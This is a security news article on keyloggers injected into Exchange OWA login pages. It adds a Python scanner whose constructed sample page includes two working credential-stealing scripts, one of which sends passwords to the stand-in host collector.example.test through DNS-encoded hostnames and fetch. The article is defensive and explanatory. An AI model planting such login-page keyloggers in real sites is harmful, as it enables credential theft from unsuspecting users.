Follow @EthHackingNews |
Hackers Target Over 70 Microsoft Exchange Servers to Steal Credentials via Keyloggers
Threat actors have been observed injecting keylogger code into the login pages of publicly exposed Microsoft Exchange servers. The injected code harvests the credentials users type into the form and stores or forwards them in plaintext.
According to Positive Technologies, the Russian cybersecurity vendor that analyzed the activity, two types of keylogger code were found on the Outlook Web Access (OWA) login page: one that saves the collected data to a local file reachable over the internet, and one that immediately sends it to an external server. The activity continues a campaign the company first documented in May 2024, which targeted entities in Africa and the Middle East.
The attack chains exploited known vulnerabilities in Microsoft Exchange Server and the Windows hosts it runs on, including CVE-2014-4078, CVE-2020-0796, CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065 (the last four are the ProxyLogon chain). The attackers used these flaws to gain access to the server and insert malicious code into the login pages. All of them have had patches available for years, so a compromised server is one that was left unpatched while exposed to the internet.
The first variant writes the collected data to a local file that can be fetched from the internet. Because the server never initiates an outbound connection, this variant produces no egress traffic for network monitoring to catch; the attacker simply retrieves the file later with an ordinary HTTP request to the OWA site. The second variant instead sends the credentials out immediately, using a Domain Name System (DNS) tunnel together with an HTTPS POST request, channels chosen to slip past organizational egress controls.
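As an added example (not code from the article or from Positive Technologies), the following Python script turns the distinction between the two variants into a detection heuristic: it pulls every script block out of a logon.aspx page, keeps the ones that read the credential fields, and classifies them by where the data goes. The page content, the injected script bodies, the `/owa/auth/current/log.aspx` handler path, the `mail.example.com` allow-list entry and the `collector.example.test` domains are all constructed for the example, and the regexes are starting-point heuristics rather than a signature set.

```python
"""Heuristic scan of an OWA logon.aspx for injected credential keyloggers.

Added example for this article, not code from the original report.  Every
path, host and script body below is constructed to model the two variants
the article describes (write to a local file fetched later over HTTP, or send
straight out via DNS/HTTPS).
"""
import re
from dataclasses import dataclass, field
from urllib.parse import urlparse

# Assumption: the server's own name; real deployments add CDN/SSO hosts here.
ALLOWED_HOSTS = {"mail.example.com"}
# The only endpoint an unmodified OWA logon form should talk to.
LEGIT_AUTH_PATH = "/owa/auth.owa"

SCRIPT_RE = re.compile(r"<script\b([^>]*)>(.*?)</script>", re.I | re.S)
SRC_RE = re.compile(r"""src\s*=\s*["']([^"']+)["']""", re.I)
# Reads of the login form's credential fields.
CRED_READ_RE = re.compile(
    r"""(getElementById|querySelector|getElementsByName)\s*\(\s*["'#]*(password|passwordText|username)\b"""
    r"""|\.(password|username)\s*\.value""", re.I)
# Client-side sinks that carry data somewhere.
SINK_RE = re.compile(r"\b(XMLHttpRequest|fetch|sendBeacon|new\s+Image)\b", re.I)
URL_RE = re.compile(r"https?://[A-Za-z0-9.\-_]+")
LOCAL_PATH_RE = re.compile(r"""["'](/owa/[^"'?]+)""")
# Hostname assembled at runtime: the DNS-tunnel idiom "https://" + data + ".c2.tld"
DYN_HOST_RE = re.compile(r"""["']https?://["']\s*\+""")


@dataclass
class Finding:
    index: int               # position of the <script> block in the page
    variant: str             # "local-file", "external" or "external-script"
    evidence: list = field(default_factory=list)


def scan_logon_page(html: str) -> list:
    """Return one Finding per script block that looks like a credential keylogger."""
    findings = []
    for i, m in enumerate(SCRIPT_RE.finditer(html)):
        attrs, body = m.group(1), m.group(2)
        src = SRC_RE.search(attrs)
        if src:  # external <script src=...> pointing off-host is itself a finding
            host = urlparse(src.group(1)).hostname
            if host and host not in ALLOWED_HOSTS:
                findings.append(Finding(i, "external-script", [f"src host {host}"]))
            continue
        if not CRED_READ_RE.search(body):
            continue  # script never touches the credential fields
        hosts = [urlparse(u).hostname for u in URL_RE.findall(body)]
        hosts = [h for h in hosts if h and h not in ALLOWED_HOSTS]
        if hosts or DYN_HOST_RE.search(body):  # variant 2: leaves the host immediately
            evidence = [f"external host {h}" for h in hosts]
            if DYN_HOST_RE.search(body):
                evidence.append("hostname built at runtime (DNS-tunnel idiom)")
            findings.append(Finding(i, "external", evidence))
        elif SINK_RE.search(body):  # variant 1: handed to a local handler, not auth.owa
            local = [p for p in LOCAL_PATH_RE.findall(body) if p != LEGIT_AUTH_PATH]
            if local:
                findings.append(Finding(i, "local-file", [f"posts credentials to {p}" for p in local]))
    return findings


# Constructed sample page: a stripped-down OWA-style form, one benign inline
# script, then two injected blocks modelled on the article's variants.
SAMPLE_LOGON_PAGE = """
<form action="/owa/auth.owa" method="post" name="logonForm">
  <input id="username" name="username">
  <input id="password" name="password" type="password">
  <input type="submit" id="btn" value="Sign in">
</form>
<script src="/owa/auth/15.1/scripts/logon.js"></script>
<script>
  function clkLgn(){ if(document.getElementById("password").value==="") return false; document.logonForm.submit(); }
</script>
<script>
  document.getElementById("btn").addEventListener("click", function(){
    var u=document.getElementById("username").value, p=document.getElementById("password").value;
    var x=new XMLHttpRequest(); x.open("POST","/owa/auth/current/log.aspx",false); x.send(u+":"+p);
  });
</script>
<script>
  document.getElementById("btn").addEventListener("click", function(){
    var d=btoa(document.getElementById("username").value+":"+document.getElementById("password").value).replace(/=/g,"");
    new Image().src="https://"+d+".collector.example.test/p.gif";
    fetch("https://collector.example.test/api",{method:"POST",body:d});
  });
</script>
"""

if __name__ == "__main__":
    for f in scan_logon_page(SAMPLE_LOGON_PAGE):
        print(f"script #{f.index}: {f.variant}: {'; '.join(f.evidence)}")
```

Run against a real server, the script would be pointed at the logon.aspx on disk (or at the HTML served to a browser, which also catches modules injected elsewhere in the pipeline). The benign OWA helper that validates the password field is deliberately left unflagged: touching the credential fields is normal for a login page, and it is the combination with a sink other than the legitimate auth endpoint that marks a keylogger.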
Twenty-two of the compromised servers belong to government organizations; IT, industrial, and logistics companies follow. The top ten countries affected are Vietnam, Russia, Taiwan, China, Pakistan, Lebanon, Australia, Zambia, the Netherlands, and Turkey.
Embedding the code in a legitimate authentication page is what makes the technique effective: the page keeps working normally, users have no reason to suspect it, and the credentials are captured in plaintext at the moment they are typed, which lets the attackers stay undetected for long periods.
The practical implication for defenders is that patching alone is not enough. Any internet-facing Exchange server that was exposed while these vulnerabilities were unpatched should also be checked for modified login pages and for unexpected files under the OWA directory, since a successful injection survives the patch that would have prevented it.
Published: Tue Jun 24 13:49:43 2025 by llama3.2 3B Q4_K_M